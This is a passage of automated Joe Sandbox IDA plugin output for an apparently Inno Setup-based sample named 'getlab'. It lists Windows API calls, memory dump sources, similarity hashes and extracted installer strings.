                                                                          • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CC9
                                                                          • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                          • String ID:
                                                                          • API String ID: 215268677-0
                                                                          • Opcode ID: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                                          • Instruction ID: 672a73815fb629360b1666c66e1be5f1e4265ed7d7d078eef31aabbee9319095
                                                                          • Opcode Fuzzy Hash: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                                          • Instruction Fuzzy Hash: 5FF037716447007FD600E6B58D81E5B73DCEB44354F04883A7E94D71C1D678DC08A726
                                                                          APIs
                                                                          • GetLastActivePopup.USER32(?), ref: 00424244
                                                                          • IsWindowVisible.USER32(?), ref: 00424255
                                                                          • IsWindowEnabled.USER32(?), ref: 0042425F
                                                                          • SetForegroundWindow.USER32(?), ref: 00424269
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                          • String ID:
                                                                          • API String ID: 2280970139-0
                                                                          • Opcode ID: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                                          • Instruction ID: 914cdc97238bca482b123af495550876eb6964b08c7fad051248fc704dde4b2b
                                                                          • Opcode Fuzzy Hash: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                                          • Instruction Fuzzy Hash: DEE0EC61706636D7AAA2767B2981A9F618D9DC53C434601ABFC04FB386DB2CDC1181BD
                                                                          APIs
                                                                          • GlobalHandle.KERNEL32 ref: 0040626F
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocHandleLockUnlock
                                                                          • String ID:
                                                                          • API String ID: 2167344118-0
                                                                          • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                          • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                          • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                          • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B44D,?,00000000,00000000,00000001,00000000,00479E79,?,00000000), ref: 00479E3D
                                                                          Strings
                                                                          • Failed to parse "reg" constant, xrefs: 00479E44
                                                                          • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00479CB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                          • API String ID: 3535843008-1938159461
                                                                          • Opcode ID: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
                                                                          • Instruction ID: 5eaaab04e28549974a1eae9ca1a9eb8293ffddd3d671f6967ea537ac56f3ac17
                                                                          • Opcode Fuzzy Hash: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
                                                                          • Instruction Fuzzy Hash: 81814174E00148AFCF11DF95C881ADEBBF9AF49314F50816AE815BB391D738AE45CB98
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B81
                                                                          • SetActiveWindow.USER32(?,00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B93
                                                                          Strings
                                                                          • Will not restart Windows automatically., xrefs: 00482CB2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveForeground
                                                                          • String ID: Will not restart Windows automatically.
                                                                          • API String ID: 307657957-4169339592
                                                                          • Opcode ID: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                                          • Instruction ID: 4958210349c6873c441c743532f51790e4d62edc104a08ffbd951144213b1fca
                                                                          • Opcode Fuzzy Hash: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                                          • Instruction Fuzzy Hash: 3541F130248240AED711FBA5EE96BBD7BE4EB55304F540CB7E8405B3A2D2FD68419B1D
                                                                          Strings
                                                                          • Failed to proceed to next wizard page; aborting., xrefs: 0046CB44
                                                                          • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CB58
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                          • API String ID: 0-1974262853
                                                                          • Opcode ID: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                                          • Instruction ID: 55592184c39aac83035684310b8d0626f6b8fe487ab2a4e85d8be474453688ef
                                                                          • Opcode Fuzzy Hash: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                                          • Instruction Fuzzy Hash: 49318D30604208DFD711EB99D98ABAA77F5EB05704F5500BBF448AB3A2D7797E40CB4A
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,00478A12,?,?,00000001,00000000,00000000,00478A2D), ref: 004789FB
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478986
                                                                          • %s\%s_is1, xrefs: 004789A4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1598650737
                                                                          • Opcode ID: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                                          • Instruction ID: 1902e23b80ae68d1a407740dd401f48df33a1007776b0bbafa0d95379bb3c34b
                                                                          • Opcode Fuzzy Hash: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                                          • Instruction Fuzzy Hash: AF216474B402449FDB01DBAACC556DEBBE8EB89704F91847FE408E7381DB789D018B59
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501D1
                                                                          • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00450202
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ExecuteMessageSendShell
                                                                          • String ID: open
                                                                          • API String ID: 812272486-2758837156
                                                                          • Opcode ID: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                                          • Instruction ID: 7e6871a26ddddf45a22869efb5a26db0f3e7f81d2927c2b78b58bd6f76e5dadf
                                                                          • Opcode Fuzzy Hash: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                                          • Instruction Fuzzy Hash: EE216274E00204AFDB04DFA5C889E9EB7F8EB44705F2085BAB814E7292D7789E44CA48
                                                                          APIs
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00455300
                                                                          • GetLastError.KERNEL32(0000003C,00000000,00455349,?,?,?), ref: 00455311
                                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorExecuteLastShellSystem
                                                                          • String ID: <
                                                                          • API String ID: 893404051-4251816714
                                                                          • Opcode ID: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                                          • Instruction ID: ab6e9011ac2a47c3b5942fb44236b8cd8890e3b7caf9c3a2037be21c94c6989b
                                                                          • Opcode Fuzzy Hash: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                                          • Instruction Fuzzy Hash: 3F212370600609AFDB10EF65D8926EE7BE8AF48355F90403AFC44E7281D7789E45CB98
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID: )
                                                                          • API String ID: 2227675388-1084416617
                                                                          • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                          • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                          • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                          • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496075
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window
                                                                          • String ID: /INITPROCWND=$%x $@
                                                                          • API String ID: 2353593579-4169826103
                                                                          • Opcode ID: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                                          • Instruction ID: 17582354874f3a564912cfd2224966d9f48ebc88dda7ed38b5aba0a92b935dc2
                                                                          • Opcode Fuzzy Hash: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                                          • Instruction Fuzzy Hash: 1111B731A042448FDF01DBA4D892BAE7FE8EB48314F51447BE504E7282D73C9905CB5C
                                                                          APIs
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • SysFreeString.OLEAUT32(?), ref: 004474BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocByteCharFreeMultiWide
                                                                          • String ID: NIL Interface Exception$Unknown Method
                                                                          • API String ID: 3952431833-1023667238
                                                                          • Opcode ID: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                                          • Instruction ID: e495528c603fed7e49a6c7636a2d67f8de45625ce5c80b81863372b855da2a7d
                                                                          • Opcode Fuzzy Hash: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                                          • Instruction Fuzzy Hash: 7A11D670604208AFEB14DFA58952A6EBFBCEB08304F91447EF504E7282D7789D05CB69
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000,0049594F), ref: 0049591A
                                                                          • CloseHandle.KERNEL32(004959B4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000), ref: 00495931
                                                                            • Part of subcall function 00495804: GetLastError.KERNEL32(00000000,0049589C,?,?,?,?), ref: 00495828
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLastProcess
                                                                          • String ID: <cI
                                                                          • API String ID: 3798668922-2480932022
                                                                          • Opcode ID: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                                          • Instruction ID: 6201355901f458c0f36557428e85d419ca31de49550c26c5d668688d9bb1e683
                                                                          • Opcode Fuzzy Hash: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                                          • Instruction Fuzzy Hash: 660161B1644648AFEF05DBA2DC42FAEBBACDF48714F61003BF504E7291D6785E05CA68
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD70
                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Value$EnumQuery
                                                                          • String ID: Inno Setup: No Icons
                                                                          • API String ID: 1576479698-2016326496
                                                                          • Opcode ID: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                                          • Instruction ID: 0d60c2ceabc561baab214a4f8badfae1c51fae2703c03b7062d0178a0b9483fa
                                                                          • Opcode Fuzzy Hash: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                                          • Instruction Fuzzy Hash: C3012632B55B307AFB3085256C42F7B568CCF46B60F68003BF981EA2C1D6989C04936E
                                                                          APIs
                                                                            • Part of subcall function 0047C8B0: FreeLibrary.KERNEL32(73400000,00480FF3), ref: 0047C8C6
                                                                            • Part of subcall function 0047C580: GetTickCount.KERNEL32 ref: 0047C5CA
                                                                            • Part of subcall function 004570B4: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570D3
                                                                          • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497E67), ref: 00497565
                                                                          • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497E67), ref: 0049756B
                                                                          Strings
                                                                          • Detected restart. Removing temporary directory., xrefs: 0049751F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                          • String ID: Detected restart. Removing temporary directory.
                                                                          • API String ID: 1717587489-3199836293
                                                                          • Opcode ID: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                                          • Instruction ID: 3a6ec644de21484b963019a16799c2105d01f9358526232ca3662f3e81dafe78
                                                                          • Opcode Fuzzy Hash: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                                          • Instruction Fuzzy Hash: C5E0E57121C6007EDE4177B6BC6295B3F9CD745778752483BF40881952E52D5810C6BD
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                                          • GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CommandHandleLineModule
                                                                          • String ID: (6W
                                                                          • API String ID: 2123368496-3037502312
                                                                          • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                          • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                          • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                          • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
